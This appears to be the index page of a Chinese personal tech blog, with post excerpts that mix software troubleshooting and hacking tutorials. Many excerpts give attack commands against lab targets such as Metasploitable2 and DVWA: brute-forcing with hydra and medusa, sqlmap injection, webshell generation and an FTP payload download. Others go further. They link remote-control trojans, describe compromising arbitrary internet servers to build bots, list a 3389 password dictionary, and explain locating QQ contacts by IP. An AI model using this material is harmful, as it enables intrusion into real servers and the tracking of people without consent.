边城浪子的博客

问题点：但该产品与此版 VMware Workstation 不兼容，因此无法使用解决方法：step1：在所在的虚拟机文件中查找.vmx结尾的文件，以记事本的方式打开。step2：将第3行“virtualHW.version = "12"”，中的12改成自己电脑安装的VMware中的版本号，直接打开该文件即可成功...

首先引用step1:进入VBA中，“工具”－－－－”引用“－－－－“Microsoft XML, v3.0”选中，－－－－“确定”第1种方式：直接引用Public Sub g()'第一种Dim xh As xmlHttpxh.Open ""End Sub引用“Microsoft XML, v3.0”后，直接定义一个xmlhttp后，后面会直接跟方法。这种方式比较简单。但很多时候兼容性不好。第二种：后期绑定Public Sub g()'第二种Set ht

VBA常见访问网络的方式有2种，一种是GET，一种是POSTGET示例代码有2种写法：第1种：Public Function MobileAddr(mobstr As String)Dim xmlHttp As ObjectSet xmlHttp = CreateObject("MSXML2.XMLHTTP")’－－－－－－－－－－－－－－－－－－－xmlHttp.Open "GET", "https://www.ip138.com/mobile.asp?mobile="...

关于VBA网络抓包，本人也是最近才接触的。从最基本的学起一点点到现在能够抓一些简单网站的包，之间查找资料浪费了大量的时间 ，也遇到了很多的问题，有的到现在还没有解决。资源分享1.网上的教程比较好的B站上面的“VBA网抓－你学得会”，讲的比较好。2.每二个比较好的网站，“http://club.excelhome.net”，介绍网抓基本的文章“不懂html也来学网抓（xmlhttp/winhttp+fiddler）”http://club.excelhome.net/thread-1159783-

问题点：在日常工作是，有需要批量打印.pdf的需求，但是客户提供的是pdf档，在pdf档的最后一页是关于客户公司的信息，如果批量打印的话，会有大量重复无用的页面，只能通过手动设置打印页数，这无疑给工作造成上大量的工作。解决方法：step1:通过网络搜索得到关于“通过查阅读pdf文件格式的标准或者官方的文件格式文档，可以得知，如果用二进制形式打开pdf文件的话，”/Count”后面出现的数字即为总页数。利用这个规则，可以使用如下的vba自定义函数获取pdf文件的总页数”通过他的代码，可以.

问题点：linux中的txt文档下载到windows中时，打开乱码，或者是没有换行，显示一整页。解决方法：step1:使用微软的word打开即可，不要使用记事本打开。写字板有时候打开也有乱码。...

项目场景：ubuntu在虚拟机中安装发后，使用xshell连接不成功。问题描述：ubuntu默认只安装客户端，不安装服务端 ，故连接不上。原因分析：安装ubuntu服务端 ，并开启ssh服务解决方案：step1:首先登陆ubuntu中，命令：sudo apt-get install openssh-serverstep2:查看是否安装成功，命令：dpkg -l | grep sshstep3:查看是否启动，命令：ps -e | grep sshstep4:如果没有启动

问题点：BurpSuite Pro2020打开时一闪而过，而我已经安装了java的jdk了，旧版本BurpSuite 均能打开。解决方法：step1：经过查找发现是“Burp Suite Pro 2020.8版本需要 JDK 9 以上才能运行，否则会出现闪退情况”step2：安装step1：step1：...

问题点：kali-linux-2020.3默认使用普通账户kali登陆，如何使用root登陆解决方法：step1:kali开机后按E，进入名为“GNU GRUB”的界面。 step2:修改以下语句，将ro quiet splash修改为rw quiet splash init=/bin/bash step3:按F10保存，之后等一会，会进入命令行界面，输入passwd root 按回车，输入新的用户密码。 step4:重新启动，即可用root用户进入。...

问题点：onenote老是开机自启动，非常讨厌。解决方法：step1:按快捷键“win+R"，打开运行窗口，输入“msconfig”命令，点击“”确定。step2:打开系统配置，点击“启动”----“打开任务管理器”。step3:找到“onenote”----右键“禁用”。step4:重新启动，"onenote"不会再自动启动了。...

利用Windows平台MS08-067漏洞，成功进行远程命令执行操作，无奈没有靶机实验，真实的互联网中也没有这样的漏洞啊。MS08-067靶机下载地址链接: https://pan.baidu.com/s/13IS0vBZTduDHdInOrO4pyQ 提取码: ip53

之前遇到过，想限制几秒钟使用鼠标不动，查了一些资料，以下来一个简单的限制鼠标移动代码。.版本 2.程序集 窗口程序集_启动窗口.子程序 _按钮1_被单击时钟1.时钟周期 ＝ 1.子程序 _时钟1_周期事件SetCursorPos (10, 10)用到的API,.版本 2.DLL命令 SetCursorPos, 逻辑型, "user32", "SetCursorPos" .参数 X, 整数型, , 0 .参数 Y, 整数型, , 0下面源码奉

有好多的方法，推荐查看https://mp.weixin.qq.com/s/1u7moGi-kYXKlE4_8hzMqQ1.感觉最实用的还是用谷歌插件“simple allow copy”，安装完后可以直接复制。2.使用冰点文库软件下载。*第1种使用谷歌浏览器插件直接安装 ，第二种网上下载该软件即可。地址：链接：https://pan.baidu.com/s/1kDTmADwbCwwWRsEWOHXnPA提取码：m9fx...

在网上下载了一款名叫“佳顺通用进销存管理软件”卸载后有残留，不管是使用某数字杀毒软件，还是电脑自带的卸载软件，都有卸载残留。1.使用IObit Uninstaller.exe软件后，完美卸载。2.geek.exe这款软件也非常好用，干净无广告。...

BD2.Net Injector By BD2工具下载地址：链接：https://pan.baidu.com/s/1KS_wQjwNpWDFBZCnLMThYA提取码：cziq远控木马下载地址：链接：https://pan.baidu.com/s/16CNDrQ3CCokuFetvSqWnRA提取码：o1wa本人测试图片木马上线不成功，木马上线是没有问题的。...

问题点：一台电脑同时装python2和python3，如何切换及使用解决方法：step1:我们很多时候需要同一台电脑同时安装2个不同版本的python,切换时，只需要输入： py -2 或py -3就可以查看电脑上安装的2个版本号，以及打开终端。step2:运行python程序时，只需要输入 :py xxx.py 即可。...

Lazysysadmin靶机下载地址：链接：https://pan.baidu.com/s/1BGpLkrEgsKwjRPgN0oUPUA提取码：qxw6系统 ：linuxsetp1:下载“Oracle VM VirtualBox”软件，并安装。setp2:导入“Lazysysadmin”虚拟靶机点击“管理”----“导入虚拟电脑”----在“文件”处，选择一个文件...

问题点：Coreldraw7 提示“由于您己安装了另一版本，因此无法安装本产品。要安装本产品，您必须首先卸载现有版本”解决办法：按照百度的方法，要在“控制面板”---“程序和功能”下卸载“Microsoft Visual C++2015”和“Microsoft NET Framework”，但是我的界面里面没有“Microsoft Visual C++2015”，只有“Microsoft ...

最简单的方法介绍工具。教程所包含工具：链接：https://pan.baidu.com/s/1fPh0rv88y64b33R47ecfxA提取码：sr2r系统：windows 10Layer子域名挖掘机5.0工具使用方法：和工具4.2用法一样。总结：比较好用的工具，我一般用这个。...

最简单的方法介绍工具。教程所包含工具：链接：https://pan.baidu.com/s/1fPh0rv88y64b33R47ecfxA提取码：sr2r系统：windows 10Layer子域名挖掘机4.2工具使用方法：在“域名”处输入查找的主域名，例：baidu.com，选择线程数，点击“开始”总结：工具比较好用，速度也比较快。...

问题点：kali 2020.02版中msfconsole报警“WARNING: No database support: could not connect to server: Connection refused”解决方法：step1:在终端中输入命令：systemctl start postgresql,启动postgresqlstep2:命令：systemctl sta...

问题点：由于新版本不熟悉，网上资料也少，导致连接不上ssh，苦恼。解决方法：1.PasswordAuthentication yes //将前面的#去掉2.将PermitRootLogin without-password修改为 PermitRootLogin yes //202002版的kali linux中是PermitRootLogin prohibit-p...

系统 ：windows 2003step1:"开始 "----"控制面板"----"添加或删除程序"----"应用程序服务器"----"Internet信息服务"----"文件传输协议"----确定step2:一路安装下去就可以了step3:“开始”----“管理工具”----“Internet信息服务管理器”----选择“默认FTP站点”右键----“属性”----“安...

最简单的方法介绍工具。系统：windows 10FastPortScan.py工具使用方法：C:\悬剑武器库\tools\端口扫描\CThun>python2 cthun.py -husage: cthun.py [-h] -s startip -e endip [-p N,N] [-tp N] [-t N] [-ms N] [-hs [tru...

最简单的方法介绍工具。系统：windows 10webservicescanner.py工具使用方法：Usage: python webscan.py 192.168.1.1/24命令：python2 webservicescanner.py 192.168.172.1/24 python2 webservicescanner.py 192.168.17...

最简单的方法介绍工具。系统：windows 10PortScan工具使用方法：usage: main.py [-h] [-d --domain] [-p --port] [-t --thread] [-w --wait] [-s show]********** Port Scanner v1.0 **********optional argume...

最简单的方法介绍工具。系统：windows 10pscan.py工具使用方法：______| ___ \| |_/ /__ ___ __ _ _ __| __/ __|/ __/ _` | '_ \| | \__ \ (_| (_| | | | |\_| |___/\___\__,_|_| |_| author: p0desta...

最简单的方法介绍工具。系统：windows 10ScanPort.exe工具使用方法：1.填写相关参数，点击“扫描”即可，多扫几次，和其它工具对比。总结 ：相对说，速度快，比较准确。需对比其它工具。...

最简单的方法介绍工具。系统：windows 10端口扫描器.exe工具使用方法：1.设置ip地址，端口号，超时数，线程数，点击“扫描”常见端口：21,139,44321,22,23,25,53,69,80,81,89,110,135,139,143,443,445,465,993,995,1080,1158,1433,1521,1863,2100,3128,3306,3389,...

最简单的方法介绍工具。系统：windows 10SuperScanV4.0-RHC.exe工具使用方法：非常古老的一款扫描端口的工具了，感觉已经不行了。直接扫不出来 。设置如下图所示。如上图，切换“TCP”和“UDP”扫描选项，多试几次。总结 ：工具太老，有些时候扫不出来 。...

最简单的方法介绍工具。系统：windows 10御剑高速端口扫描工具 V1.01 beta工具使用方法：1.输入IP地址，选择端口范围，点击“开始”总结：扫描还可以，准确度稍高。...

最简单的方法介绍工具。系统：windows 10RapidScanner.exe工具使用方法：1.开启软件后，输入IP地址，选择端口模工，点“start”开始扫描。3种端口模式：---------------------------------------------------------------100个常见端口1000个常见端口自定义端口------...

最简单的方法介绍工具。系统：windows 10环境:python2portscan工具使用方法： ____ __ _____ / __ \____ _____/ /_/ ___/_________ _____ ____ ___ _____ / /_/ / __ \/ ___/ __/\__ \/ ___/ __ `/ _...

最简单的方法介绍工具。系统：windows 10masscan-GUI V0.72工具使用方法：1.打开软件后，输入“网址”，或ip地址后，点击“>>ping ”-----点击“端口扫描”端口模式有3种分别为：-----------------------------------------------------------------------------...

最简单的方法介绍各种工具。系统：windows 10K8PortScan工具使用方法：usage: K8PortScan.exe [-h] [-ip IP] [-f IP_FILE] [-p PORT]optional arguments: -h, --help show this help message and exit -ip IP IP or I...

问题点：打开软件提示“找不到libwinpthread-1.dll”等提示解决办法：step1:下载libwinpthread-1.dll文件,将该文件复制到软件目录里面step2:新建一个批处理文件，代码如下：@echo 开始注册copy dll %windir%\system32\regsvr32 %windir%\system32\dll /s@echo dll注册成功...

问题点：打开winsockexpert V0.6 beta1工具，点选”打开进程“，里面没有显示进程列表。解决方法：此种问题一般是程序不兼容造成的，step1:选择程序”winsockexpert V0.6 beta1“----右键”兼容性疑难解答“-----“疑难解答程序”----“下一步”----“windows xp(service pack3)”-----"下一步"----“测...

问题点：己将该虚拟机配置为使用64位客户机操作系统。但是，无法执行64位操作...解决方法：step1:重新启动计算机，开机后不停按”F2“，进入BIOS界面。step2:选择Security，再选择Virtual ization并点击enter建进入该功能，在新功能中选择Intel (R) Virtualization Technology，此时该选项应该是disabl...

在虚拟机中，玩远程控制木马的时候，不知道点了哪个远控，估计是捆绑有木马或病毒，导致“注册表编辑器”，“任务管理器”都无法打开，同样的问题在物理机中也出现过，之前是使用“NODXX杀毒软件”杀掉的。36x没杀掉，反复杀毒，一直存在。先说下解决方法吧（有关键字，无法发布）。问题点：注册表编辑器，任务管理器，己被系统管理员停用解决方法：step1:快捷键，win+R，输入 gp...

代码：<!DOCTYPE html><html><head> <title>动态显示时间</title></head><body> <script > function clock(){ var str="现在时间：" var today=new Date(); ...

问题点：phpstudy运行时3306端口被占用解决方法解决方法：此方法是可以消除报警，网站也打不开了。1.打开CMD,输入命令：netstat -ano,记下PID,2.打开任务管理器，找到PID值，右键“结束任务”3.phpstudy 重新启动。解决方法2：phpstudy.exe----"其它菜单选项"----"phpstudy设置"----“端口常规设置”修改里面的33...

问题点1：ipconfig出现“windows ip ocnfiguration”解决方法：如下图，“我的电脑”----“属性”----“硬件”----“设备管理器”----找到"网络适配器“，右键“属性”----使用这个设备（启用）问题点2：接着出现 “media state ..........:media disconnected”报警解决方法：在虚拟机中，“虚拟机”...

问题点：“Component 'MSCOMCTLOCX' or one of its dependencies not correctly registered:a file is missing or invalid”原因：mscomctl.ocx控件没有注册解决方法：step1:下载“mscomctl.ocx 64”位文件.step2:以管理员权限复制进入“C:\windo...

1.第一课简单系统介绍 常见入侵端口：3389 4899 5900 1433 21 23 135 445-----------------------------------------------------------------2.第二课： 80和8080端口拿服务器step1:使用S扫描器，扫描8080或80端口,保存ip地址ips.txt。step2:打开 Apache ...

问题点：打开软件出现报警"you must have local administrator privileges to run this program!"解决方法：图标右键打开，“编辑项目信息”----“始终以管理员权限启动”选中----“确定”即可解决...

本人初次使用这款工具，不太会用。网上介绍的都是linux下，或windows下exe版.jar版如下打开方式。step1:右键管理员方式打开CMD，切换到cobaltstrike目录中，输入命令：teamserver.bat 本机IP 密码step2:另一个窗口打开cmd切换到目录,也是使用管理员方式打开。输入：cobaltstrike.batstep3:成功打开。...

step1:打开wireshark,点开始，开始捕捉。step2:在QQ中，选择一名好友，点语音连接，连接几秒后挂掉。step3:在wireshark中，点---编辑----分组搜索，在表达式中，输入：udp,选择“分组详情”----“字符串”-----“020048”。即可查到好友IP。step4:在“https://www.ipip.net”中，输入ip即可查询对方地址。...

1.在网上查找看到相关解决方法，但都没有解决我的这个问题，直到看到一篇文章中“出现这个问题的原因是Wireshark中由于自带的Winpcap不支持Win10”，按照这个方法，我下载了最新的win10版winpcap,在安装过程中出现问题，安装不成功。2.第二种方法，以管理员的身份在cmd中输入命令 net start npf ，npf是启动了，也以管理员运行wireshark了，但还是不成功...

最近在玩电脑的时候，小孩一直在旁边吵着要玩电脑，怕把桌面的文件搞乱，也不让关电脑 ，于是想做一个屏幕锁。以下是屏幕锁的源代码：效果就是若隐若现。源代码文件：链接：https://pan.baidu.com/s/1KRNcyAoIfnNBDnSLVki-Rw提取码：usjd...

本实验为2019黑客入门基础windows网络安全精讲里面的内容，为搭建ASP网站步骤，以及可能出现的问题。step1:开启IIS管理器,点”开始“----”管理工具“----”信息服务管理器“step2:新建网站，右键”网站“----”新建“----”网站“，一步步按照创建向导来设置，如下图。按需配置选项。step3:设置默认内容文档。右键刚设置的网站...

像ISO这样的镜像光盘，如何在虚拟机中像光盘一样打开呢？step1:右键虚拟机”设置“----”CD/DVD“----”使用ISO映像文件“----”浏览“-----确定step2:打开”我的电脑“----”有可移动存储的设备“打开后复制粘贴即可。...

在进行ARP，DNS攻击实验的时候需要一个局域网环境，本次就搭建这个环境。靶机环境：windows-xp IP:10.1.1.1kali-linux2019.2IP:10.1.1.2windows-2003IP:10.1.1.3step1:下载靶机，并导入靶机点----“文件”----“打开”，有提示“是否己复制”----点“己复制”step2:桥接到VMnet2上...

实验环境：攻击机：windows-xpip:192.168.0.103目标机：任意外网服务器攻击过程：step1:使用S扫描器，扫描8080或80端口,保存ip地址ips.txt。step2:打开 Apache Tomcat Crack工具，-----“设置”-----“导入己扫IP”-----“点导入（ips.txt）”-----“开始”step3:寻找类似这...

1.chopper2.Cknife3.WeBaCoo命令：webacoo -g -o hack.php连接命令：webacoo -t -u http://192.168.152.130/pentest/test/11/upload/hack.php成功连接4.Weevely命令：weevely generate 123456 hack.php命令：weevely http://1...

一。爆破445 smb1.命令行:hydra 192.168.0.104 smb -l Administrator -P /root/Desktop/1.txt -T 64 -V192.168.0.104是目标服务器的IP地址smb 是协议-L 大写指定一个帐号字典 小写l指定用户名称-P 指定一个密码字典 小写p指定一个密码-V 现实爆破测试的详细过程-t 线程1-64之...

一.xp系统支持syn扫描。先破解syn扫描限制 ，或在win2003上面使用dubrute1.界面意思：?Source表示“源”。?Bad表示“失败的”?Good表示“成功的”?Error表示“错误的”?Check表示：“检测”?Thread表示“线程”?Start表示“开始”?Stop表示“停止”?Config表示“配置”?Generation 表示“生成”?About表...

方法是网上找的，结合自己搭建的环境写的。自动下载：echo open 192.168.0.104>ftp.txtecho admin>>ftp.txtecho 123456>>ftp.txtecho cd 1 >>ftp.txtecho get 1.txt c:\1.txt>>ftp.txtecho bye>>ftp...

一.免杀的方法：1.特征码法2.校验和法3.行为监测法4.软件模拟法 二.目前主流杀毒软件以特征码法为主。 常见杀毒软件1.卡巴斯基2.瑞星3.江民杀毒软件4.诺顿5.金山毒霸6.NOD327.麦咖啡8.小红伞9.F-Prot Antivirus10.微软杀毒三.根据类别和方法分类1...

都是我以前总结的笔记，步骤是照着书上打的，书上总结的很全了。OEP(original entry point)程序入口点脱壳方法一，使用单步跟踪法追踪OEP步骤：1.用OD载入待脱壳文件，如果出现压缩提示，选择“不分析代码”。2.向下单步跟踪，实现向下的跳转。3.遇到程序往上跳转的时候（包括循环），在回跳的下一句代码上单击并按键盘上的“F4”键跳过回跳指令。4.OD中的绿色线条表示...

一.打造个人版软件（修改版权）1.用C32打开目标软件（目标软件必须为未加壳）2.搜索-ANSI字符串-“要修改的内容”3.打到要修改的内容，以00填充4.把要修改的内容粘贴进去即可。二.反捆绑软件1.用反捆绑软件检测木马是否被捆绑2.C32反汇编工具编译成十六进制，看最后是否有2个exe文件，如果是为捆绑了木马(一般在文件末尾)三.手动查杀木马1.CMD里输入ne...

1.系统自带“TCP/IP筛选"功能对服务器端口的限制网上邻居-本地连接-属性-启用TCP/IP筛选（输入端口号只允许此端口连接）2.服务：开启计算机后，系统会默认启动很多服务项，且每项服务都有一个具体的文件存在，一般存储在C:\windows\system32文件下，其扩展名一般为.exe.dll.sys.等，另外，还可以根据自己的需要开启操作系统中相应的服务和关闭不必要的服务。开启服务...

一.关闭1.运行：gpedit.msc2.管理模板-windows组件-windows defender-关闭windows defender(配置为己启用)3.重启。 二.开启1.和关闭相反。 三.如何关闭更新1.运行gpedit.msc2.管理模板-winddows组件-windows更新-配置自动更新（...

C:\Windows\SoftwareDistribution\Download //路径下文件删除 ，文件为更新的系统文件。

实验环境：攻击机：windowsxpip:192.168.0.102目标机：windows2003ip:192.168.0.101攻击过程:step1:3389远程登陆服务器step2:登陆具有管理员权限的账户step3:打开注册表，并修改SAM权限step4:CMD新建一个user组用户step5:导出注册表step6:修改注册表...

黑手安全网的一套抓鸡教程地址：链接：https://pan.baidu.com/s/1EK9Q1hYs4_bEN648Bg0LWA提取码：6u2x工具集合：链接：https://pan.baidu.com/s/1gJ8l-UGE4LvVFsldJok6CA提取码：1bkb一.端口扫描篇1.tcp全扫描抓鸡专用S扫描器.exe 使用方法：输入开始IP...

3389字典：abc123654321123windowssystemchishukun090386123456admin123passwordadmin123host.okxr.comfuwuqi1321321zzzzz77777admin@12312332112345aaaaaa1qazXSW@@ssw0rdassword01@ssw0rd01...

关于DVWA的介绍网上太多。实验环境：windows2003服务器（192.168.152.128）DVWA源码包攻击过程：step1:打开浏览器，设代理 ，Burpsuite设代理 。step2:抓包如图，保存为sql_low.txt。网址：http://192.168.152.128/dvwa/vulnerabilities/sqli/step3:使用sql...

需求：1.有一些每天都要找开的网站 ，一键打开。2.自动登陆FTP。3.自动登陆简单的网站（使用FTP模拟）。步骤：step1:新建批处理文件并粘贴以下代码@echo off start https://blog.csdn.net/qq_30508729start http://www.linuxprobe.com/start ftp://admin:admin@1...

1.使用qq和对方视频，通过whireshark软件抓包，分析是可以得出对方IP地址的。2.或者通过给对方发送一个网页跳转的功能，获取对方IP地址。3.获取对方IP地址后，定位对方IPstep1:打开www.ipplus360.comstep2:输入IP地址。获取到大概位置(定位在10KM我感觉已经很高了)。另利用经纬度查询地址的网址：1.http://map.y...

有些手机相机是默认开启了GPS功能的，所以自带GPS信息。可以查到自己的经纬度。我自己试了一下很精确了。step1:将手机照片传到电脑上。（必须是原图）step2:打开软件“MagicEXIF 元数据编辑器”step3:将图片拖进主界面。注意：如果不是原图，经过微信等传输过的都是经过压缩处理的图片。不能查到相关的GPS信息。...

后门名称：Phpstudy后门威胁等级：严重影响范围：Phpstudy 2016、phpstudy2018后门类型：C&C、命令执行利用难度：极易影响范围目前已知受影响的phpstudy版本：· Phpstudy 2016版php-5.4· Phpstudy 2018版php-5.2.17· Phpstudy 2018版php-5.4.45看了...

今天看了一个公众号的文章，”女友长期半夜不回家，窃听了她手机后得知的结果令我崩溃“感觉思路很好。故总结这篇文章，自己总结的方法不全。1.易语言编写小工具（我自己编写的）社工，让其打开。以下为源码链接：https://pan.baidu.com/s/1oGN6tltrYsxnb4HhaNFW2g提取码：9koi获取到的目标IP地址：2.js获取IP地址以...

1.暴力破解（brute force）low级别setp1:浏览器，burpsuite设代理。step2:抓包,发送intruder,step3:暴破medium级别step1:同上步骤higth级别step1:无法直接利用burpsuite暴破，需要使用python编写代码进行暴破。2.命令执行漏洞（command injection）靶机容易打坏low级...

问题点：安装后提示：SHA1 digest of file 悬剑2.0-disk1.vmdk does not match manifest解决：1.删除目录下的“悬剑2.0mf”文件2.继续安装，需要大概1个小时左右，开机提示点取消。重启。...

1.判断注入点，获取网站信息sqlmap.py -u http://www.xx.com/ss.asp?id=123例：sqlmap.py -u “http://www.xx.com/ss.asp?id=123”2.获取所有数据库sqlmap.py -u http://www.xx.com/ss.asp?id=123 –dbs例：sqlmap.py -u “http:/...

Tomcat 服务器是一个免费的开放源代码的Web 应用服务器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调试JSP 程序的首选。默认情况下，8180端口是tomcat管理的HTTP端口实验环境：攻击机：kali linuxip:192.168.172.134目标机：Metasploittable2ip:192.168.172.129攻...

IRC是Internet Relay Chat 的英文缩写，中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展，目前世界上有超过60个国家提供了IRC的服务。IRC的工作原理非常简单，您只要在自己的PC上运行客户端软件，然后通过因特网以IRC协议连接到一台IRC服务器上即可。它的特点是速度非常之快，聊天时几乎没有延迟的现象，并...

VNC (Virtual Network Console)是虚拟网络控制台的缩写。它 是一款优秀的远程控制工具软件，由著名的 AT&T 的欧洲研究实验室开发的。可视化控制，类似于远程桌面，默认vnc服务端运行在5900端口实验环境：攻击机：kali linuxip:192.168.172.134目标机：Metasploittable2ip:192.168.172.129...

利用 msf 下 postgresql的 代码执行获得反弹shell.实验环境：攻击机：kali linuxip:192.168.172.134目标机：Metasploittable2ip:192.168.172.129攻击过程:step1:探测nmap 192.168.172.129nmap -sV -p 5432 192.168.172.129step2:漏...

PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES，现在已经更名为PostgreSQL，版本 4.2为基础的对象关系型数据库管理系统（ORDBMS）。PostgreSQL支持大部分 SQL标准并且提供了许多其他现代特性：复杂查询、外键、触发器、视图、事务完整性、MVCC。同样，PostgreSQL 可以用许多方法扩展，比如， 通过增加新的数据类型、函数、操作符、聚集函数、索...

MySQL是一个关系型数据库管理系统，由瑞典MySQL AB 公司开发，目前属于 Oracle 旗下产品。MySQL 是最流行的关系型数据库管理系统之一，在 WEB 应用方面，MySQL是最好的 RDBMS (Relational Database Management System，关系数据库管理系统) 应用软件。 MySQL是一种关系数据库管理系统，关系数据库将数据保存在不同的表中，而不是将所...

ProFTPD:一个Unix平台上或是类Unix平台上（如Linux, FreeBSD等）的FTP服务器程序 http://www.proftpd.org/实验环境：攻击机：kali linuxip:192.168.172.134目标机：Metasploittable2ip:192.168.172.129攻击过程:step1:探测nmap -sV -p2121 192...

NFS（Network File System）即网络文件系统，是FreeBSD支持的文件系统中的一种，它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中，本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件，就像访问本地文件一样。实验环境：攻击机：kali linuxip:192.168.172.134目标机：Metasploittable2ip:...

实验环境：攻击机：kali linuxip:192.168.172.134目标机：Metasploittable2ip:192.168.172.129攻击过程:step1:使用nmap 扫描靶机nmap 192.168.172.129step2:发现存在1524/tcp open ingreslock,进一步扫描详细信息nmap -sV -p 1524 192.16...

Java RMI 指的是远程方法调用 (Remote Method Invocation)。它是一种机制，能够让在某个 Java 虚拟机上的对象调用另一个 Java 虚拟机中的对象上的方法。实验环境：攻击机：kali linuxip:192.168.172.134目标机：Metasploittable2ip:192.168.172.129攻击过程:step1:nmap扫描漏...

服务器：windows 2003攻击机：windows 10搭建过程：下载discuz！ML 3.x源码链接：https://pan.baidu.com/s/1QFd8rdXn_Je6lOehSLTIWw提取码：5ka0step1:在windows 2003中安装phpstudystep2:将源码中upload中的文件上传至phpstudy的www目录中。step3:打...

远程登录（rlogin）是一个 UNIX 命令，它允许授权用户进入网络中的其它 UNIX 机器并且就像用户在现场操作一样。一旦进入主机，用户可以操作主机允许的任何事情实验环境：攻击机：kali linuxip:192.168.172.134目标机：Metasploittable2ip:192.168.172.129攻击过程：step1:nmap 进行探测nmap 192...

实验环境：攻击机：kali linuxip:192.168.172.134目标机：Metasploittable2ip:192.168.172.129攻击过程:setp1:使用nmap探测sambanmap -sV -p 139 445 192.168.172.129setp1:metasploit漏洞利用启动msf命令：use exploit/multi/sa...

rpcbind是NFS中用来进行消息通知的服务实验环境：攻击机：kali linuxip:192.168.172.134目标机：Metasploittable2ip:192.168.172.129攻击过程：setp1:使用nmap 探测命令：nmap 192.168.172.129命令：nmap -sV -p 111192.168.172.129命令：nma...

实验环境：攻击机：kali linuxip:192.168.172.134目标机：Metasploittable2ip:192.168.172.129攻击过程：step1:使用medusa爆破medusa -h 192.168.172.129 -u msfadmin -P /root/Desktop/password.txt -M smtp...

1.telnet测试用户名例 ：telnet 192.168.172.129 25 一个一个手动测试获得用户名是否存在2.smtp-user-enum测试用户名例：smtp-user-enum -M VRFY -U /root/Desktop/password.txt -t 192.168.172.1293.metasploit测试用户名启动msfuse au...

网址为：http://www.cn-hack.cn/qs/5.htm第1关要求输入密码解题：右键被禁止了，直接在浏览器（我用的是搜狗），菜单栏-----查看-----查看源代码即可查看<script language="Javascript">function PassConfirm() {var x=document.password.pass.valueif...

第1关第一关地址http://www.cn-hack.cn/game/2/****.html****加密部分 为以下值e70dfb1dea416cec 解题：“e70dfb1dea416cec ”应该是加密的，扔MD5解密为“site”第一关网址为“http://www.cn-hack.cn/game/2/site.html”第2关第二关地址%68%74...

chrome安装 ModHeader安装提示程序包无效:"CRX_HEADER_INVALID"解决方法：1.右上角点击“三个点”--------”更多工具“--------“扩展程序”。2.将下载的ModHeader 2.1.2 重命名为ModHeader 2.1.2.rar(注意必须是rar，zip不行的)，解压。3.“加载己解压的扩展程序”-------选择这个解压后的rar...

step1:添加主机名和域名sudo gedit /etc/hosts127.0.0.1 test mail.test.labsudo test gedit /etc/hostname修改完成之后使用 reboot进行重启，使得修改生效使用 hostname 或 hostname -f 查看修改是否成功。step2:配置yum环境，并安装postfixyum i...

step1:打开yum目录命令：cd /etc/yum.repos.d命令：ls新建一个文件以repo结尾touch rhel7.repostep2:修改文件内容[base]name= yum repobaseurl=http://mirrors.aliyun.com/centos/7/os/$basearch/enabled=1gpgcheck=0ste...

实验环境：攻击机：kali linuxip:192.168.172.134目标机：Metasploittable2ip:192.168.172.129攻击过程：step1:爆破Metasploittable2的telnet登陆密码，用户名：msfadmin,密码:msfadmin //用户非root权限step2:msf 登陆Metasploittable2后...

实验环境：控制机：windows10ip:192.168.0.102目标机：Metasploittable2ip:192.168.172.129攻击过程：step1:安装telnetwindows10默认是不安装telnet“运行”----“control”----"添加删除程序"----"启动或关闭window功能"---"telnet开启"----确定step2:...